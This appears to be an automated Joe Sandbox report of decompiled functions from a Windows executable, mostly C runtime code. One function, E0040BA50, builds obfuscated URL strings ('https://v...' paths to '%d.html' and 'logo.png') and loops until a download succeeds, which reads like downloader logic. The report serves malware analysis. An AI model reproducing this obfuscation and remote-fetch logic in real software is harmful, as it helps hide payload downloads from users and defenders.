                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$BoundString$AllocFree
                                                            • String ID: $"$%$.$.$.$3$CloseHandle$GET$M$T$WriteFile$a$d$d$e$l$l$n$o$r$x
                                                            • API String ID: 3733012023-1576864280
                                                            • Opcode ID: 8348f4f3d00b15aae75aa9e81ad00ad7bac9ea643b3389176f1a395d4abf057e
                                                            • Instruction ID: 4ecabf40e4453d729f9e28f24bf90e9b6dd5012648f85afd37e8fd1231670d8f
                                                            • Opcode Fuzzy Hash: 8348f4f3d00b15aae75aa9e81ad00ad7bac9ea643b3389176f1a395d4abf057e
                                                            • Instruction Fuzzy Hash: 01E14974D04258DFDB14DFA4C988BDEBBB5BF48304F1081A9E509BB291CB795A88CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0040BA50(void* __ebx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				char _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				char _v68;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				char _v104;
                                                            				intOrPtr _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				char _v132;
                                                            				signed int _v136;
                                                            				char _v660;
                                                            				_Unknown_base(*)()* _v664;
                                                            				intOrPtr _v668;
                                                            				signed int _t51;
                                                            				void* _t63;
                                                            				void* _t64;
                                                            				void* _t67;
                                                            				intOrPtr _t70;
                                                            				void* _t78;
                                                            				void* _t79;
                                                            				signed int _t80;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            
                                                            				_t79 = __esi;
                                                            				_t78 = __edi;
                                                            				_t67 = __ebx;
                                                            				_t51 =  *0x40f020; // 0xebf16b9c
                                                            				_v136 = _t51 ^ _t80;
                                                            				_v132 = 0x740068;
                                                            				_v128 = 0x700074;
                                                            				_v124 = 0x3a0073;
                                                            				_v120 = 0x2f002f;
                                                            				_v116 = 0x2e0076;
                                                            				_v112 = 0x31f0468d;
                                                            				_v108 = 0x67007a;
                                                            				_v104 = 0x31e44676;
                                                            				_v100 = 0x760065;
                                                            				_v96 = 0x63002e;
                                                            				_v92 = 0x6d006f;
                                                            				_v88 = 0x25002f;
                                                            				_v84 = 0x2e0064;
                                                            				_v80 = 0x740068;
                                                            				_v76 = 0x6c006d;
                                                            				_v72 = 0;
                                                            				_v68 = 0x740068;
                                                            				_v64 = 0x700074;
                                                            				_v60 = 0x3a0073;
                                                            				_v56 = 0x2f002f;
                                                            				_v52 = 0x2e0076;
                                                            				_v48 = 0x31f0468d;
                                                            				_v44 = 0x67007a;
                                                            				_v40 = 0x31e44676;
                                                            				_v36 = 0x760065;
                                                            				_v32 = 0x63002e;
                                                            				_v28 = 0x6d006f;
                                                            				_v24 = 0x6c002f;
                                                            				_v20 = 0x67006f;
                                                            				_v16 = 0x2e006f;
                                                            				_v12 = 0x6e0070;
                                                            				_v8 = 0x67;
                                                            				_v112 = _v112 - 0x31774615;
                                                            				_v48 = _v48 - 0x31774615;
                                                            				_t38 =  &_v104; // 0x31e44676
                                                            				_v104 =  *_t38 - 0x31774615;
                                                            				_t40 =  &_v40; // 0x31e44676
                                                            				_v40 =  *_t40 - 0x31774615;
                                                            				_v668 = E0040B250();
                                                            				_t70 =  *0x410034; // 0x38f
                                                            				_t76 =  &_v132;
                                                            				_v668( &_v660,  &_v132, _t70);
                                                            				_t82 = _t81 + 0xc;
                                                            				_v664 = GetProcAddress(E0040B130(), "CoInitialize");
                                                            				_v664(0);
                                                            				while(1) {
                                                            					_t63 = E0040B270(_t67, _t76, _t78, _t79,  &_v660, 1);
                                                            					_t82 = _t82 + 8;
                                                            					if(_t63 != 0) {
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            				while(1) {
                                                            					L3:
                                                            					_t77 =  &_v68;
                                                            					_t64 = E0040B270(_t67,  &_v68, _t78, _t79,  &_v68, 2);
                                                            					_t82 = _t82 + 8;
                                                            					if(_t64 != 0) {
                                                            						break;
                                                            					}
                                                            				}
                                                            				return E0040158C(E0040B730(_t67,  &_v68, _t78, _t79, 0x410c50), _t67, _v136 ^ _t80, _t77, _t78, _t79);
                                                            			}

















































                                                            0x0040ba50
                                                            0x0040ba50
                                                            0x0040ba50
                                                            0x0040ba59
                                                            0x0040ba60
                                                            0x0040ba66
                                                            0x0040ba6d
                                                            0x0040ba74
                                                            0x0040ba7b
                                                            0x0040ba82
                                                            0x0040ba89
                                                            0x0040ba90
                                                            0x0040ba97
                                                            0x0040ba9e
                                                            0x0040baa5
                                                            0x0040baac
                                                            0x0040bab3
                                                            0x0040baba
                                                            0x0040bac1
                                                            0x0040bac8
                                                            0x0040bacf
                                                            0x0040bad6
                                                            0x0040badd
                                                            0x0040bae4
                                                            0x0040baeb
                                                            0x0040baf2
                                                            0x0040baf9
                                                            0x0040bb00
                                                            0x0040bb07
                                                            0x0040bb0e
                                                            0x0040bb15
                                                            0x0040bb1c
                                                            0x0040bb23
                                                            0x0040bb2a
                                                            0x0040bb31
                                                            0x0040bb38
                                                            0x0040bb3f
                                                            0x0040bb4e
                                                            0x0040bb5a
                                                            0x0040bb5d
                                                            0x0040bb66
                                                            0x0040bb69
                                                            0x0040bb71
                                                            0x0040bb79
                                                            0x0040bb7f
                                                            0x0040bb86
                                                            0x0040bb91
                                                            0x0040bb97
                                                            0x0040bbab
                                                            0x0040bbb3
                                                            0x0040bbb9
                                                            0x0040bbc2
                                                            0x0040bbc7
                                                            0x0040bbcc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040bbce
                                                            0x0040bbd0
                                                            0x0040bbd0
                                                            0x0040bbd2
                                                            0x0040bbd6
                                                            0x0040bbdb
                                                            0x0040bbe0
                                                            0x00000000
                                                            0x00000000
                                                            0x0040bbe2
                                                            0x0040bc01

                                                            APIs
                                                              • Part of subcall function 0040B250: GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 0040B25E
                                                              • Part of subcall function 0040B130: LoadLibraryA.KERNELBASE(OLE32), ref: 0040B15C
                                                            • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 0040BBA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: .$.$/$/$/$/$CoInitialize$d$g$h$h$h$m$o$o$o$o$p$s$s$t$t$v$v$vF1e$vF1e$z$z
                                                            • API String ID: 2238633743-1388441996
                                                            • Opcode ID: 26bfa028fd92e02be19c4815d7085b7a5eff42b40c05db2e34abeaf3e16427b4
                                                            • Instruction ID: 29c4d6fe62a38ab3825c0bf816cb8c3261ebc723cec8645cf58b77fc56d4057a
                                                            • Opcode Fuzzy Hash: 26bfa028fd92e02be19c4815d7085b7a5eff42b40c05db2e34abeaf3e16427b4
                                                            • Instruction Fuzzy Hash: EB4104B0D00208CBDF10EFA5D9497ADBBB1BB04308F10856DD5097B255DBBA5A88CFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0040338E(void* __ebx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				_Unknown_base(*)()* _t7;
                                                            				long _t10;
                                                            				void* _t11;
                                                            				int _t12;
                                                            				void* _t18;
                                                            				intOrPtr _t21;
                                                            				long _t26;
                                                            				void* _t30;
                                                            				struct HINSTANCE__* _t37;
                                                            				void* _t40;
                                                            				void* _t42;
                                                            
                                                            				_t30 = __ebx;
                                                            				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                            				if(_t37 != 0) {
                                                            					 *0x410510 = GetProcAddress(_t37, "FlsAlloc");
                                                            					 *0x410514 = GetProcAddress(_t37, "FlsGetValue");
                                                            					 *0x410518 = GetProcAddress(_t37, "FlsSetValue");
                                                            					_t7 = GetProcAddress(_t37, "FlsFree");
                                                            					__eflags =  *0x410510;
                                                            					_t40 = TlsSetValue;
                                                            					 *0x41051c = _t7;
                                                            					if( *0x410510 == 0) {
                                                            						L6:
                                                            						 *0x410514 = TlsGetValue;
                                                            						 *0x410510 = E004030AE;
                                                            						 *0x410518 = _t40;
                                                            						 *0x41051c = TlsFree;
                                                            					} else {
                                                            						__eflags =  *0x410514;
                                                            						if( *0x410514 == 0) {
                                                            							goto L6;
                                                            						} else {
                                                            							__eflags =  *0x410518;
                                                            							if( *0x410518 == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								__eflags = _t7;
                                                            								if(_t7 == 0) {
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					_t10 = TlsAlloc();
                                                            					__eflags = _t10 - 0xffffffff;
                                                            					 *0x40f2c4 = _t10;
                                                            					if(_t10 == 0xffffffff) {
                                                            						L15:
                                                            						_t11 = 0;
                                                            						__eflags = 0;
                                                            					} else {
                                                            						_t12 = TlsSetValue(_t10,  *0x410514);
                                                            						__eflags = _t12;
                                                            						if(_t12 == 0) {
                                                            							goto L15;
                                                            						} else {
                                                            							E00403944();
                                                            							 *0x410510 = E00402FDF( *0x410510);
                                                            							 *0x410514 = E00402FDF( *0x410514);
                                                            							 *0x410518 = E00402FDF( *0x410518);
                                                            							 *0x41051c = E00402FDF( *0x41051c);
                                                            							_t18 = E00401C23();
                                                            							__eflags = _t18;
                                                            							if(_t18 == 0) {
                                                            								L14:
                                                            								E004030E1();
                                                            								goto L15;
                                                            							} else {
                                                            								_push(E0040326D);
                                                            								_t21 =  *((intOrPtr*)(E0040304B( *0x410510)))();
                                                            								__eflags = _t21 - 0xffffffff;
                                                            								 *0x40f2c0 = _t21;
                                                            								if(_t21 == 0xffffffff) {
                                                            									goto L14;
                                                            								} else {
                                                            									_t42 = E00403552(1, 0x214);
                                                            									__eflags = _t42;
                                                            									if(_t42 == 0) {
                                                            										goto L14;
                                                            									} else {
                                                            										_push(_t42);
                                                            										_push( *0x40f2c0);
                                                            										__eflags =  *((intOrPtr*)(E0040304B( *0x410518)))();
                                                            										if(__eflags == 0) {
                                                            											goto L14;
                                                            										} else {
                                                            											_push(0);
                                                            											_push(_t42);
                                                            											E0040311E(_t30, _t37, _t42, __eflags);
                                                            											_t26 = GetCurrentThreadId();
                                                            											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                            											 *_t42 = _t26;
                                                            											_t11 = 1;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					return _t11;
                                                            				} else {
                                                            					E004030E1();
                                                            					return 0;
                                                            				}
                                                            			}
















                                                            0x0040338e
                                                            0x0040339a
                                                            0x0040339e
                                                            0x004033be
                                                            0x004033cb
                                                            0x004033d8
                                                            0x004033dd
                                                            0x004033df
                                                            0x004033e6
                                                            0x004033ec
                                                            0x004033f1
                                                            0x00403409
                                                            0x0040340e
                                                            0x00403418
                                                            0x00403422
                                                            0x00403428
                                                            0x004033f3
                                                            0x004033f3
                                                            0x004033fa
                                                            0x00000000
                                                            0x004033fc
                                                            0x004033fc
                                                            0x00403403
                                                            0x00000000
                                                            0x00403405
                                                            0x00403405
                                                            0x00403407
                                                            0x00000000
                                                            0x00000000
                                                            0x00403407
                                                            0x00403403
                                                            0x004033fa
                                                            0x0040342d
                                                            0x00403433
                                                            0x00403436
                                                            0x0040343b
                                                            0x0040350d
                                                            0x0040350d
                                                            0x0040350d
                                                            0x00403441
                                                            0x00403448
                                                            0x0040344a
                                                            0x0040344c
                                                            0x00000000
                                                            0x00403452
                                                            0x00403452
                                                            0x00403468
                                                            0x00403478
                                                            0x00403488
                                                            0x00403495
                                                            0x0040349a
                                                            0x0040349f
                                                            0x004034a1
                                                            0x00403508
                                                            0x00403508
                                                            0x00000000
                                                            0x004034a3
                                                            0x004034a3
                                                            0x004034b4
                                                            0x004034b6
                                                            0x004034b9
                                                            0x004034be
                                                            0x00000000
                                                            0x004034c0
                                                            0x004034cc
                                                            0x004034ce
                                                            0x004034d2
                                                            0x00000000
                                                            0x004034d4
                                                            0x004034d4
                                                            0x004034d5
                                                            0x004034e9
                                                            0x004034eb
                                                            0x00000000
                                                            0x004034ed
                                                            0x004034ed
                                                            0x004034ef
                                                            0x004034f0
                                                            0x004034f7
                                                            0x004034fd
                                                            0x00403501
                                                            0x00403505
                                                            0x00403505
                                                            0x004034eb
                                                            0x004034d2
                                                            0x004034be
                                                            0x004034a1
                                                            0x0040344c
                                                            0x00403511
                                                            0x004033a0
                                                            0x004033a0
                                                            0x004033a8
                                                            0x004033a8

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401930), ref: 00403394
                                                            • __mtterm.LIBCMT ref: 004033A0
                                                              • Part of subcall function 004030E1: __decode_pointer.LIBCMT ref: 004030F2
                                                              • Part of subcall function 004030E1: TlsFree.KERNEL32(00000005,0040350D), ref: 0040310C
                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004033B6
                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004033C3
                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004033D0
                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004033DD
                                                            • TlsAlloc.KERNEL32 ref: 0040342D
                                                            • TlsSetValue.KERNEL32(00000000), ref: 00403448
                                                            • __init_pointers.LIBCMT ref: 00403452
                                                            • __encode_pointer.LIBCMT ref: 0040345D
                                                            • __encode_pointer.LIBCMT ref: 0040346D
                                                            • __encode_pointer.LIBCMT ref: 0040347D
                                                            • __encode_pointer.LIBCMT ref: 0040348D
                                                            • __decode_pointer.LIBCMT ref: 004034AE
                                                            • __calloc_crt.LIBCMT ref: 004034C7
                                                            • __decode_pointer.LIBCMT ref: 004034E1
                                                            • __initptd.LIBCMT ref: 004034F0
                                                            • GetCurrentThreadId.KERNEL32 ref: 004034F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                            • API String ID: 2657569430-3819984048
                                                            • Opcode ID: 4071aec27f7d09c471dda12a253f7bbca169d07f9d8b340a498e5a629070b856
                                                            • Instruction ID: 9f9584be4b56187a013b53a262d2f6cdf5c805aaa557de8ed8451558a70591cd
                                                            • Opcode Fuzzy Hash: 4071aec27f7d09c471dda12a253f7bbca169d07f9d8b340a498e5a629070b856
                                                            • Instruction Fuzzy Hash: DE315370940205FAD721EF75AD45A563EAAAB00759B10863BE410F62F1EBF98781CF9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0040159B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				intOrPtr* _t10;
                                                            				intOrPtr _t13;
                                                            				intOrPtr _t23;
                                                            				void* _t25;
                                                            
                                                            				_push(0xc);
                                                            				_push(0x40df20);
                                                            				_t8 = E004028CC(__ebx, __edi, __esi);
                                                            				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                            				if(_t23 == 0) {
                                                            					L9:
                                                            					return E00402911(_t8);
                                                            				}
                                                            				if( *0x4111cc != 3) {
                                                            					_push(_t23);
                                                            					L7:
                                                            					_t8 = HeapFree( *0x4103b4, 0, ??);
                                                            					_t31 = _t8;
                                                            					if(_t8 == 0) {
                                                            						_t10 = E00401B5B(_t31);
                                                            						 *_t10 = E00401B20(GetLastError());
                                                            					}
                                                            					goto L9;
                                                            				}
                                                            				E00401D99(4);
                                                            				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                            				_t13 = E00401E12(_t23);
                                                            				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                            				if(_t13 != 0) {
                                                            					_push(_t23);
                                                            					_push(_t13);
                                                            					E00401E3D();
                                                            				}
                                                            				 *(_t25 - 4) = 0xfffffffe;
                                                            				_t8 = E004015F1();
                                                            				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                            					goto L9;
                                                            				} else {
                                                            					_push( *((intOrPtr*)(_t25 + 8)));
                                                            					goto L7;
                                                            				}
                                                            			}







                                                            0x0040159b
                                                            0x0040159d
                                                            0x004015a2
                                                            0x004015a7
                                                            0x004015ac
                                                            0x00401623
                                                            0x00401628
                                                            0x00401628
                                                            0x004015b5
                                                            0x004015fa
                                                            0x004015fb
                                                            0x00401603
                                                            0x00401609
                                                            0x0040160b
                                                            0x0040160d
                                                            0x00401620
                                                            0x00401622
                                                            0x00000000
                                                            0x0040160b
                                                            0x004015b9
                                                            0x004015bf
                                                            0x004015c4
                                                            0x004015ca
                                                            0x004015cf
                                                            0x004015d1
                                                            0x004015d2
                                                            0x004015d3
                                                            0x004015d9
                                                            0x004015da
                                                            0x004015e1
                                                            0x004015ea
                                                            0x00000000
                                                            0x004015ec
                                                            0x004015ec
                                                            0x00000000
                                                            0x004015ec

                                                            APIs
                                                            • __lock.LIBCMT ref: 004015B9
                                                              • Part of subcall function 00401D99: __mtinitlocknum.LIBCMT ref: 00401DAD
                                                              • Part of subcall function 00401D99: __amsg_exit.LIBCMT ref: 00401DB9
                                                              • Part of subcall function 00401D99: EnterCriticalSection.KERNEL32(?,?,?,00405A5C,00000004,0040E128,0000000C,00403565,?,?,00000000,00000000,00000000,00403207,00000001,00000214), ref: 00401DC1
                                                            • ___sbh_find_block.LIBCMT ref: 004015C4
                                                            • ___sbh_free_block.LIBCMT ref: 004015D3
                                                            • HeapFree.KERNEL32(00000000,?,0040DF20,0000000C,0040100C,?), ref: 00401603
                                                            • GetLastError.KERNEL32(?,?,?,0040DF20,0000000C,0040100C,?), ref: 00401614
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2714421763-0
                                                            • Opcode ID: 715825a031288f099a094aa5f0a8570a65f21abb85a35e0d1b48caedcea89e37
                                                            • Instruction ID: 41f52afbf4e112d9fb7568739c74b3c6e806d5542676bf96b3d08f156f8e2a56
                                                            • Opcode Fuzzy Hash: 715825a031288f099a094aa5f0a8570a65f21abb85a35e0d1b48caedcea89e37
                                                            • Instruction Fuzzy Hash: 5E014F71901602EADB207BA29D0AB5E3B64AF40368F24453FF5057A1E1DB7C99409A9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E00408920() {
                                                            				signed long long _v12;
                                                            				signed int _v20;
                                                            				signed long long _v28;
                                                            				signed char _t8;
                                                            
                                                            				_t8 = GetModuleHandleA("KERNEL32");
                                                            				if(_t8 == 0) {
                                                            					L6:
                                                            					_v20 =  *0x40dbf8;
                                                            					_v28 =  *0x40dbf0;
                                                            					asm("fsubr qword [ebp-0x18]");
                                                            					_v12 = _v28 / _v20 * _v20;
                                                            					asm("fld1");
                                                            					asm("fcomp qword [ebp-0x8]");
                                                            					asm("fnstsw ax");
                                                            					if((_t8 & 0x00000005) != 0) {
                                                            						return 0;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				} else {
                                                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                            					if(__eax == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_push(0);
                                                            						return __eax;
                                                            					}
                                                            				}
                                                            			}







                                                            0x00408925
                                                            0x0040892d
                                                            0x00408944
                                                            0x004088f0
                                                            0x004088f9
                                                            0x00408905
                                                            0x00408908
                                                            0x0040890b
                                                            0x0040890d
                                                            0x00408910
                                                            0x00408915
                                                            0x0040891f
                                                            0x00408917
                                                            0x0040891b
                                                            0x0040891b
                                                            0x0040892f
                                                            0x00408935
                                                            0x0040893d
                                                            0x00000000
                                                            0x0040893f
                                                            0x0040893f
                                                            0x00408943
                                                            0x00408943
                                                            0x0040893d

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00407C9E), ref: 00408925
                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408935
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                            • API String ID: 1646373207-3105848591
                                                            • Opcode ID: 75dafc7f45e323bb5b769500b5312da08f43c9aa8a7900d91081934756ca8dc5
                                                            • Instruction ID: 605c781860af894325431a5166e568f4fbe082905a4f86ec8b28f6043db036c2
                                                            • Opcode Fuzzy Hash: 75dafc7f45e323bb5b769500b5312da08f43c9aa8a7900d91081934756ca8dc5
                                                            • Instruction Fuzzy Hash: 0FC012A0B89200E2EA902BF11F49F3626082B44B0AF24423AB049F01C0CEB8C004E02E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00401030(char* _a4, int _a8) {
                                                            				short* _v16;
                                                            				int _v20;
                                                            				char _v28;
                                                            				int _v32;
                                                            				short* _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				short* _v48;
                                                            				short* _t39;
                                                            
                                                            				if(_a4 == 0 || _a8 == 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_v20 = E00401020();
                                                            					E00401570( &_v28);
                                                            					_v36 = 0;
                                                            					_v32 = MultiByteToWideChar(_v20, 0, _a4, _a8, 0, 0);
                                                            					_t39 = _v32;
                                                            					_v16 = _t39;
                                                            					if(_a8 == 0xffffffff) {
                                                            						_v16 = _v16 - 1;
                                                            					}
                                                            					__imp__#4(0, _v16);
                                                            					_v36 = _t39;
                                                            					if(_v36 == 0) {
                                                            						L8:
                                                            						_v48 = _v36;
                                                            						E004014C0( &_v28);
                                                            						return _v48;
                                                            					} else {
                                                            						_v40 = MultiByteToWideChar(_v20, 0, _a4, _a8, _v36, _v32);
                                                            						if(_v40 == _v32) {
                                                            							goto L8;
                                                            						}
                                                            						__imp__#6(_v36);
                                                            						_v44 = 0;
                                                            						E004014C0( &_v28);
                                                            						return _v44;
                                                            					}
                                                            				}
                                                            			}












                                                            0x0040103a
                                                            0x00000000
                                                            0x00401049
                                                            0x0040104e
                                                            0x00401054
                                                            0x00401059
                                                            0x00401078
                                                            0x0040107b
                                                            0x0040107e
                                                            0x00401085
                                                            0x0040108d
                                                            0x0040108d
                                                            0x00401096
                                                            0x0040109c
                                                            0x004010a3
                                                            0x004010ea
                                                            0x004010ed
                                                            0x004010f3
                                                            0x00000000
                                                            0x004010a5
                                                            0x004010c1
                                                            0x004010ca
                                                            0x00000000
                                                            0x00000000
                                                            0x004010d0
                                                            0x004010d6
                                                            0x004010e0
                                                            0x00000000
                                                            0x004010e5
                                                            0x004010a3

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,00000000,00000000), ref: 00401072
                                                            • SysAllocStringLen.OLEAUT32(00000000,000000FF), ref: 00401096
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,?), ref: 004010BB
                                                            • SysFreeString.OLEAUT32(00000000), ref: 004010D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiStringWide$AllocFree
                                                            • String ID:
                                                            • API String ID: 447844807-0
                                                            • Opcode ID: 2bec2e3abdc9887048b051c05daded1fd39536edc123c76721433bea13e66d55
                                                            • Instruction ID: 1cd42949e467d549a5b563eba143ca2e91b2afb32e3a91e5961ec4af91c2d553
                                                            • Opcode Fuzzy Hash: 2bec2e3abdc9887048b051c05daded1fd39536edc123c76721433bea13e66d55
                                                            • Instruction Fuzzy Hash: 9221C875E00208EFCB04DFA5C895BEEB7B4BB48304F108229E515BB290D739A941CFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00408814(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                            				intOrPtr _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            
                                                            				_t28 = __ebx;
                                                            				_t25 = _a16;
                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                            					_t26 = E00408111(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            					goto L9;
                                                            				} else {
                                                            					_t35 = _t25 - 0x66;
                                                            					if(_t25 != 0x66) {
                                                            						__eflags = _t25 - 0x61;
                                                            						if(_t25 == 0x61) {
                                                            							L7:
                                                            							_t26 = E004081FD(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            						} else {
                                                            							__eflags = _t25 - 0x41;
                                                            							if(__eflags == 0) {
                                                            								goto L7;
                                                            							} else {
                                                            								_t26 = E0040871C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            							}
                                                            						}
                                                            						L9:
                                                            						return _t26;
                                                            					} else {
                                                            						return E00408663(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                            					}
                                                            				}
                                                            			}







                                                            0x00408814
                                                            0x00408817
                                                            0x0040881d
                                                            0x00408890
                                                            0x00000000
                                                            0x00408824
                                                            0x00408824
                                                            0x00408827
                                                            0x00408842
                                                            0x00408845
                                                            0x00408865
                                                            0x00408877
                                                            0x00408847
                                                            0x00408847
                                                            0x0040884a
                                                            0x00000000
                                                            0x0040884c
                                                            0x0040885e
                                                            0x0040885e
                                                            0x0040884a
                                                            0x00408895
                                                            0x00408899
                                                            0x00408829
                                                            0x00408841
                                                            0x00408841
                                                            0x00408827

                                                            APIs
                                                            Memory Dump Source
